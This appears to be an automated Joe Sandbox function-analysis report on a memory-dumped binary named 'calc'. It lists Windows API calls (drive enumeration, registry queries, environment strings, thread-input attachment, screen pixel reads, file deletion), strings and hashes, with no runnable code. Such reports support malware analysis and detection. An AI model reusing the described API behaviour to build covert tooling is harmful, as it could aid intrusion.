Instruction ID: 0b4f8b80ce955dd39e9ac8b4367f021f5a5185ffdf9ca56efeb76a6332b40596
Opcode Fuzzy Hash: 6dfcbc6126d7e1adef419d680d0bc0d4d3c0ea62a5b762055ce8b29b0c99149b
Instruction Fuzzy Hash: 88615B35A00208AFDB10EBA1CC85EEEB7B9EF08314F14455AF812E7261DB38E945DB58

Function 00423BD7 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 201COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,00000000,0045C6D0), ref: 00423C27
GetDriveTypeW.KERNEL32(?,00460454,00000061,unknown,ramdisk,network,fixed,removable,cdrom,all), ref: 00423D90

Strings

cdrom, xrefs: 00423C5B
removable, xrefs: 00423C85
z, xrefs: 00423DC4
fixed, xrefs: 00423CAF
ramdisk, xrefs: 00423D09
all, xrefs: 00423C2D
unknown, xrefs: 00423D36
network, xrefs: 00423CDC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown$z
API String ID: 2426244813-3835205858
Opcode ID: 8a4ab123c8cba6d9525edc1d6ce77014fad253863c0f01a28e7912fb11828709
Instruction ID: c943f114b9cfa34bc6d13cecd34174d1ce99e7829156bc061d10869983b5239c
Opcode Fuzzy Hash: 8a4ab123c8cba6d9525edc1d6ce77014fad253863c0f01a28e7912fb11828709
Instruction Fuzzy Hash: DA61E332E40225AACF20AF51EC426EEB771EF40715F51415FE91177192CB7C9E8A9A8C

Function 00430474 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 108registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 004304B7
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000028,00000000,00000000,00000000,?), ref: 004304DE
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?,00000000,?,interface\), ref: 00430524
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,000001FE), ref: 0043053D
IIDFromString.COMBASE(00000000,00000000), ref: 00430572
RegCloseKey.ADVAPI32(?), ref: 0043057E
RegCloseKey.ADVAPI32(?), ref: 0043059C

Strings

interface\, xrefs: 004304F5
interface, xrefs: 004304AC
(, xrefs: 0043058D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseOpen$EnumFromQueryStringValue
String ID: ($interface$interface\
API String ID: 297354694-3327702407
Opcode ID: ece2d1dff503f8bd69a3f8af120fc2c2525d4bfacb4d65e8794cc370887e5a92
Instruction ID: 465c8dba0b75a2b588b9d9a645616a4f636eb8d9ae8370a13ef1e90354eccf22
Opcode Fuzzy Hash: ece2d1dff503f8bd69a3f8af120fc2c2525d4bfacb4d65e8794cc370887e5a92
Instruction Fuzzy Hash: DA412B7290021DFFEF10DBA0CC44AEEB7BCEB08315F20456AE910E2190D7399E449F28

Function 0040D7FC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0040D81B
IsChild.USER32(?,00000000), ref: 0040D82A
SendMessageW.USER32(?,00000087,00000000,00000000), ref: 0040D845
SendMessageW.USER32(?,00000087,00000000,00000000), ref: 0040D850
SendMessageW.USER32(?,000000B1,00000001,0000FFFF), ref: 0040D86B
SendMessageW.USER32(?,000000B1,00000000,FFFF0000), ref: 0040D883
GetDlgCtrlID.USER32(?), ref: 0040D892
GetDlgCtrlID.USER32(?), ref: 0040D8A4
SetFocus.USER32(?,00000008,00000000), ref: 0040D8C1

Strings

0, xrefs: 0040D88A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$CtrlFocus$Child
String ID: 0
API String ID: 155916262-4108050209
Opcode ID: d990ddb02262e76da551cf043bd84009251360777e327b3fa7c4ebf42c808ac8
Instruction ID: f2e533566926b18452da6f46fbe18385ad865f3593145e1545aacff08ac70125
Opcode Fuzzy Hash: d990ddb02262e76da551cf043bd84009251360777e327b3fa7c4ebf42c808ac8
Instruction Fuzzy Hash: D5215C72D00248FFDB12AFA48C44AAE7FB8EB45344F14807AF814B3291D3389D199B64

Function 00456097 Relevance: 16.8, APIs: 11, Instructions: 309COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00462758,00000001,00000000,00000000,0045C448,0000003C,00456CFA,?,00000100,00000000,00000001,?,00000003,?), ref: 004560BE
GetLastError.KERNEL32(?,?,00456071,?,00000000,00000000,?,00000000,?,?,0040EF80,?,00000000,00000001,?,00000000), ref: 004560D0
MultiByteToWideChar.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,0045C448,0000003C,00456CFA,?,00000100,00000000,00000001,?,00000003,?), ref: 00456157
MultiByteToWideChar.KERNEL32(?,00000001,00000001,00000000,0040EF80,00000000,?,?,00456071,?,00000000,00000000,?,00000000), ref: 004561D8
LCMapStringW.KERNEL32(00000000,?,0040EF80,00000000,00000000,00000000,?,?,00456071,?,00000000,00000000,?,00000000), ref: 004561F2
LCMapStringW.KERNEL32(00000000,?,0040EF80,00000000,?,0040EF80,?,?,00456071,?,00000000,00000000,?,00000000), ref: 0045622D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: fc6c9aa6a9f52a24aeea4c38a669645abb95c9f67080a9718bde3479416d75e9
Instruction ID: b2d8dc44d8ca8eb0f0711e217ba9cf18ae384d9cb4d0d13082bcb19e82ea283e
Opcode Fuzzy Hash: fc6c9aa6a9f52a24aeea4c38a669645abb95c9f67080a9718bde3479416d75e9
Instruction Fuzzy Hash: 84B1AA7280021AEFDF119FA0CC858EF7BB5FB0831AF55422AF915A3262D3398D55DB58

Function 00453588 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(75730A60,00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004535A3
GetLastError.KERNEL32(?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004535B7
GetEnvironmentStringsW.KERNEL32(75730A60,00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004535DA
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00453614
GetEnvironmentStrings.KERNEL32(75730A60,00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 00453637
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 00453652
_strlen.LIBCMT ref: 0045365F
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,?,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004536A3
_strlen.LIBCMT ref: 004536AE
FreeEnvironmentStringsA.KERNEL32(00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004536CB
FreeEnvironmentStringsA.KERNEL32(00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004536E7

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide_strlen$ErrorLast
String ID:
API String ID: 871561937-0
Opcode ID: 003261c868aba84407b309368d2df2010800c3ad6bf430fac483b8c332b13f78
Instruction ID: 189182811b8b7028e3f3fa76c12f55b7742606a7d7476da671c1c8c24d5278b9
Opcode Fuzzy Hash: 003261c868aba84407b309368d2df2010800c3ad6bf430fac483b8c332b13f78
Instruction Fuzzy Hash: 63411572508255BFD7306F249C8886B7798EB4439B724192FFC46C3243FB299E48D25D

Function 00442E86 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 236fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004168A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0045C6D0,?,?,?,00442C32,00000000,0045C6D0), ref: 004168CE

Part of subcall function 004168A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00442C32,00000000,0045C6D0), ref: 004168F0

_strcat.LIBCMT ref: 00442EB7
_strcat.LIBCMT ref: 00442EC4
DeleteFileA.KERNEL32(?), ref: 00443140

Part of subcall function 0044341F: CreateFileA.KERNEL32(00000003,40000000,00000001,00000000,00000003,00000080,00000000,00000000,0044315A,?,?,?), ref: 00443436
Part of subcall function 0044341F: SetFileTime.KERNEL32(00000000,?,00000000,?), ref: 0044344E
Part of subcall function 0044341F: CloseHandle.KERNEL32(00000000), ref: 00443455

Strings

{QB, xrefs: 00442EA0

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: File$ByteCharMultiWide_strcat$CloseCreateDeleteHandleTime
String ID: {QB
API String ID: 896891539-2627146250
Opcode ID: 6826efe30987594fd26c18010b1386a6d7d18b79fb1223cd70e0a5c5c14c2d66
Instruction ID: 10c7d94db973383b35a21a2cb43c7254eeebb8db6f0dbf89339a4b2e7f1b655e
Opcode Fuzzy Hash: 6826efe30987594fd26c18010b1386a6d7d18b79fb1223cd70e0a5c5c14c2d66
Instruction Fuzzy Hash: 4D815F72810118AAEF21EFA1CC45FDEB7BCAF44715F00459AF604E6141E778AB94CB6A

Function 00417510 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004175B0
VariantInit.OLEAUT32(?), ref: 004175B6
VariantInit.OLEAUT32(?), ref: 004175BC
VariantInit.OLEAUT32(?), ref: 004175C2
VariantInit.OLEAUT32(?), ref: 004175CB
VariantInit.OLEAUT32(?), ref: 004175D1
VariantInit.OLEAUT32(?), ref: 004175DA
VariantInit.OLEAUT32(?), ref: 004175E3

Strings

vA, xrefs: 00417520

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: InitVariant
String ID: vA
API String ID: 1927566239-2626632682
Opcode ID: 2b8e8d1de6cab0282e133a8643d30c6927eb614832e0a50d65b6f873aa70965a
Instruction ID: 5b2c6dfc33667c660dbbcac74fe3b7b2d15e924b2877dc2a32538863b1b3df48
Opcode Fuzzy Hash: 2b8e8d1de6cab0282e133a8643d30c6927eb614832e0a50d65b6f873aa70965a
Instruction Fuzzy Hash: 1531FCB290065ABFCB00DFB5DC84986BBADFF08304744852BE919C3A01D734E6A4CFA5

Function 00402257 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,00000001,00000002), ref: 004022E9
GetDlgCtrlID.USER32(00000000), ref: 004022FA
GetParent.USER32 ref: 0040230C
SendMessageW.USER32(00000000,?,00000111,?), ref: 00402313
GetDlgCtrlID.USER32(00000000), ref: 00402319
GetParent.USER32 ref: 0040232F
SendMessageW.USER32(00000000,?,00000111,?), ref: 00402336

Strings

ComboBox, xrefs: 0040226B
ListBox, xrefs: 004022A3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: f55888848f7bcba7b3474df748bed1eb155f8da7799cdcffac09153758cf926d
Instruction ID: 21d4efe765151b58f1e8dd2b8bd2338c310614b799d46b9de95d0ec11e15162d
Opcode Fuzzy Hash: f55888848f7bcba7b3474df748bed1eb155f8da7799cdcffac09153758cf926d
Instruction Fuzzy Hash: 8521D871904318BBDF119BB5CC49BBE7BA8DF05311F1000AAF501BB1E2C6BD9D459B69

Function 0040205D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004020ED
GetDlgCtrlID.USER32(00000000), ref: 004020FE
GetParent.USER32 ref: 00402110
SendMessageW.USER32(00000000,?,00000111,?), ref: 00402117
GetDlgCtrlID.USER32(00000000), ref: 0040211D
GetParent.USER32 ref: 00402133
SendMessageW.USER32(00000000,?,00000111,?), ref: 0040213A

Strings

ComboBox, xrefs: 00402071
ListBox, xrefs: 004020A9

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 3983e01f07cdc23e322d383c5d11142c0d4e7b734c74ec4230ae8d4061f8d687
Instruction ID: 1ae3639546ccadbcf58f9fd73665429625f42c9a5e242655649765a7bb30241d
Opcode Fuzzy Hash: 3983e01f07cdc23e322d383c5d11142c0d4e7b734c74ec4230ae8d4061f8d687
Instruction Fuzzy Hash: 7121F871900318BBDF11AB69CC49BBE7BA8DF05311F1000A6F601BB1E2C6BD9D49DB69

Function 0043B8ED Relevance: 15.3, APIs: 10, Instructions: 297registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043B992
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,?,?,?,HKCR\), ref: 0043B9BC
RegCloseKey.ADVAPI32(?,?,?,?,?,?,HKCR\), ref: 0043B9CE
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,?,?,?,?,?,HKCR\), ref: 0043BA0C
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,0001FFFE,00000000,?,?,?,?,?), ref: 0043BA8A
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,HKCR\), ref: 0043BB16
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,0000FFFF,00000000,?,?,?,?,?), ref: 0043BB70
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,0001FFFE,00000000,?,?,?,?,?), ref: 0043BBE6
RegCloseKey.ADVAPI32(?,00000000,00000000,?,?,?,?,?,HKCR\), ref: 0043BC25
RegCloseKey.ADVAPI32(?), ref: 0043BC30

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: QueryValue$Close$ConnectOpenRegistry
String ID:
API String ID: 1162896230-0
Opcode ID: 0a542f6942da37330aad247183a938a9115cce9e06ddae1f36175f9a5f351c56
Instruction ID: 50d668c21b230dfb2cab80434d9b6aad851b21af5472c1ebae7558954520c36c
Opcode Fuzzy Hash: 0a542f6942da37330aad247183a938a9115cce9e06ddae1f36175f9a5f351c56
Instruction Fuzzy Hash: 15B17471900119EBDF20EF95DC81BEEB7B8EF08314F14505BEA05A7251DB38AE45DB98

Function 00406DD9 Relevance: 15.2, APIs: 10, Instructions: 152COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,00000000), ref: 00406E3D
GetWindowRect.USER32(?,00000000), ref: 00406E73
ShowWindow.USER32(?,00000006,00000000,?,00000000), ref: 00406EDB
ShowWindow.USER32(?,00000000,00000000,?,00000000), ref: 00406EE5
ShowWindow.USER32(?,?,00000000,?,00000000), ref: 00406F01
LockWindowUpdate.USER32(00000000,00000000,?,00000000), ref: 00406F38
InvalidateRect.USER32(?,00000000,00000001), ref: 00406F43
LockWindowUpdate.USER32(?,00000000,?,00000000), ref: 00406F50
EnableWindow.USER32(?,00000001), ref: 00406F5E
ShowWindow.USER32(?,?,00000000,?,00000000), ref: 00406F6D

Part of subcall function 0040B6AE: ShowWindow.USER32(00000003,00000000), ref: 0040B705
Part of subcall function 0040B6AE: EnableWindow.USER32(00000000,00000000), ref: 0040B719
Part of subcall function 0040B6AE: ShowWindow.USER32(00000003,00000000), ref: 0040B766
Part of subcall function 0040B6AE: ShowWindow.USER32(00000000,00000004), ref: 0040B76E
Part of subcall function 0040B6AE: EnableWindow.USER32(00000000,00000001), ref: 0040B782
Part of subcall function 0040B6AE: SendMessageW.USER32(?,0000130C,?,00000000), ref: 0040B7A6

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$Show$EnableRect$LockUpdate$ClientInvalidateMessageSend
String ID:
API String ID: 3346090438-0
Opcode ID: 33eebad1770066d7da53f507c13526217a4cc38fd14724ef0744f22b750f0efe
Instruction ID: 00179a3cef90f437505424dea41472531886ad940d9ced4b58695a5b59db2541
Opcode Fuzzy Hash: 33eebad1770066d7da53f507c13526217a4cc38fd14724ef0744f22b750f0efe
Instruction Fuzzy Hash: 1251C135604385EFCB31CF68D98856BBBA5AF00311B16083FE587E3691D639E864C79D

Function 00410C44 Relevance: 15.1, APIs: 10, Instructions: 85threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00410C65
GetForegroundWindow.USER32(00000000), ref: 00410C75
GetWindowThreadProcessId.USER32(00000000), ref: 00410C82
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00410C93
GetWindowThreadProcessId.USER32(?,?), ref: 00410CA3
AttachThreadInput.USER32(00000000,00000000,00000001,?,?), ref: 00410CB8
AttachThreadInput.USER32(00000000,00000000,00000001,?,?), ref: 00410CC7
AttachThreadInput.USER32(00000000,00000000), ref: 00410CFF
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00410D13
AttachThreadInput.USER32(00000000,00000000), ref: 00410D1D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 84dc89106fe828588eff58668885925fa9e7e82d517fbaf7a7cf41849782f584
Instruction ID: 273981aa6d5314c39ed11dbc8b11d4783a6718a70bb47b2180bf8327ec5c3e70
Opcode Fuzzy Hash: 84dc89106fe828588eff58668885925fa9e7e82d517fbaf7a7cf41849782f584
Instruction Fuzzy Hash: FE218071504305AFDB24DF66DC44A6BBBEDEB84341F14496FF10582251EBB9A8C0CF69

Function 0042B2C3 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

74D6A570.USER32(00000000), ref: 0042B4A8
SelectObject.GDI32(?,00000000), ref: 0042B530
SelectObject.GDI32(?,?), ref: 0042B558
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0042B581
DeleteObject.GDI32(?), ref: 0042B595
DeleteDC.GDI32(?), ref: 0042B59E
GetPixel.GDI32(00000007,?,?), ref: 0042B646

Strings

(, xrefs: 0042B4EF

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Object$DeleteSelect$A570BitsPixel
String ID: (
API String ID: 2851233416-3887548279
